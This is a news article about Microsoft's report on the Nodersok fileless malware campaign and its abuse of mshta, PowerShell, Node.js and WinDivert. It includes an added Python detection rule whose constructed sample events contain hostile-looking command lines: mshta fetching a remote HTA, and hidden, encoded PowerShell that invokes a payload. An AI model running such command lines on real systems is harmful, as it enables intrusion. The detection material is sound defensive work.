September 27, 2019

Microsoft Warns Over Sophisticated, “Peculiar” New Malware using Node.js

Nodersok runs on node.exe, WinDivert; disables Windows Defender Antivirus

By CBR Staff Writer

Microsoft’s threat team has flagged an unusual flavour of malware, which uses a rare combination of techniques to fly under the radar of endpoint detection tools.

The campaign uses “two unusual legitimate tools” to run on infected machines, then relies on an “elusive network infrastructure” to turn them into zombie proxies.

The malware campaign, dubbed Nodersok, went through a “long chain of fileless techniques to install a pair of very peculiar tools”, Microsoft said in a Thursday blog published by its ATP Research Team – including the popular Node.js framework.

It also disables (or tries to disable) Windows Defender Antivirus and Windows updates, and runs a binary shellcode that attempts elevation of privilege by using another legitimate Microsoft service: the Microsoft Connection Manager Profile Installer.

What’s so Unusual About Nodersok?

Nodersok, which uses the two legitimate tools to avoid detection, persist, and move laterally – a technique known as living-off-the-land binaries (LOLBins) – delivers Node.exe, the Windows implementation of the Node.js framework, and WinDivert, a network packet capture and manipulation utility, to its target machines.

LOLBin-based malware is, in itself, now no novelty. But Nodersok went through a “long chain of fileless techniques” to install the “peculiar” tools, Microsoft said, and although malware using Node.js has been identified in the past, it remains rare.

(A detailed look at the attack chain can be found here).


The complex Nodersok attack. Credit: Microsoft

The malware campaign initially went undetected, but Microsoft uncovered the campaign in mid-July, when suspicious patterns in the anomalous usage of MSHTA.exe emerged from Microsoft Defender ATP telemetry, its team said.

(MSHTA.exe is a utility that executes Microsoft HTML Applications).

LOLBins Approach Makes it Hard to Spot

Alarmingly for victims, every single step of the infection chain runs only legitimate LOLBins, either from the machine itself (mshta.exe, powershell.exe) or downloaded third-party ones (node.exe, WinDivert.dll/sys).

This makes it nigh impossible for traditional signature-based detection defence techniques to catch it and stop it at the periphery.

As Microsoft’s ATP team puts it: “All of the relevant functionalities reside in scripts and shellcodes that are almost always coming in encrypted, are then decrypted, and run while only in memory. No malicious executable is ever written to the disk.”
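Because no malicious file touches disk, the practical handle defenders have is exactly what the article says surfaced the campaign: anomalous use of the LOLBins themselves (mshta.exe spawning a script host, PowerShell with in-memory flags, node.exe and WinDivert components appearing where they have no business). The following is an added example, not code from the article or from Microsoft’s write-up: a small hunting rule over process-creation events. The event records, field names and file paths are constructed for the example and only approximate Sysmon-style process-creation telemetry.

```python
"""
Added example (not from the article or Microsoft's blog): flag the LOLBin
chain the article describes in constructed process-creation events.
Field names approximate Sysmon Event ID 1 fields; paths and values are made up.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Binaries named in the article: machine-local LOLBins and the dropped third-party ones.
LOCAL_LOLBINS = {"mshta.exe", "powershell.exe"}
DROPPED_TOOLS = {"node.exe"}
WINDIVERT_ARTIFACTS = {"windivert.dll", "windivert.sys"}
# Locations where node.exe is normally installed (assumption for this example).
EXPECTED_NODE_PREFIXES = ("c:\\program files",)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str                       # full path of the new process
    cmdline: str
    parent_image: str                # full path of the parent process
    loaded_modules: Tuple[str, ...] = ()   # constructed: modules seen in the process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def findings_for(ev: ProcEvent) -> List[str]:
    """Return human-readable findings for one event; empty list means nothing suspicious."""
    img = basename(ev.image)
    parent = basename(ev.parent_image)
    cmd = ev.cmdline.lower()
    out: List[str] = []

    # 1. mshta.exe launching a script host: the anomaly the telemetry surfaced.
    if parent == "mshta.exe" and img in LOCAL_LOLBINS:
        out.append(f"mshta.exe spawned {img}")

    # 2. mshta.exe fetching an HTA from a remote URL rather than a local file.
    if img == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
        out.append("mshta.exe invoked with a remote URL")

    # 3. PowerShell started with flags typical of in-memory, encoded scripts.
    if img == "powershell.exe" and any(f in cmd for f in ("-enc", "bypass", "hidden")):
        out.append("powershell.exe with encoded/bypass flags")

    # 4. node.exe running from outside its expected install location.
    if img in DROPPED_TOOLS and not ev.image.lower().startswith(EXPECTED_NODE_PREFIXES):
        out.append(f"{img} running from unexpected path {ev.image}")

    # 5. WinDivert packet-capture components loaded into any process.
    if any(basename(m) in WINDIVERT_ARTIFACTS for m in ev.loaded_modules):
        out.append("WinDivert driver/library loaded")

    return out


def hunt(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map pid -> findings for every event that triggered at least one rule."""
    hits: Dict[int, List[str]] = {}
    for ev in events:
        f = findings_for(ev)
        if f:
            hits[ev.pid] = f
    return hits


# Constructed sample telemetry: a chain like the one described, plus two benign events.
SAMPLE_EVENTS = [
    ProcEvent(1, 100, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://example.invalid/ad.hta", r"C:\Windows\explorer.exe"),
    ProcEvent(2, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAA=", r"C:\Windows\System32\mshta.exe"),
    ProcEvent(3, 2, r"C:\Users\alice\AppData\Local\Temp\node.exe",
              "node.exe -e <constructed script>", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              loaded_modules=(r"C:\Users\alice\AppData\Local\Temp\WinDivert.dll",)),
    ProcEvent(4, 100, r"C:\Program Files\nodejs\node.exe",
              "node.exe server.js", r"C:\Windows\explorer.exe"),          # benign developer use
    ProcEvent(5, 100, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Tools\local.hta", r"C:\Windows\explorer.exe"),  # local HTA, no flag
]

if __name__ == "__main__":
    for pid, findings in hunt(SAMPLE_EVENTS).items():
        print(pid, findings)
```

Each rule on its own is noisy (developers run node.exe, administrators run encoded PowerShell), which is why the function reports per-event findings rather than a verdict: the value comes from correlating them along the parent/child chain, as the events above do, and from baselining what node.exe and WinDivert normally look like in your own estate.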

The attack appears to have been in its early stages, and while the technique used to reach the destination is sophisticated, the payload code is “still in its infancy and in development”, Microsoft said, adding that it has not observed network requests coming from attackers.

It’s the kind of attack that’s a poster child for AI/anomaly-detection-based security software, and the ATP team was keen to emphasise the powers of its own Microsoft Defender ATP product in helping identify the series of attacks, which primarily hit consumers in the US and Europe, but also professional services and finance customers.
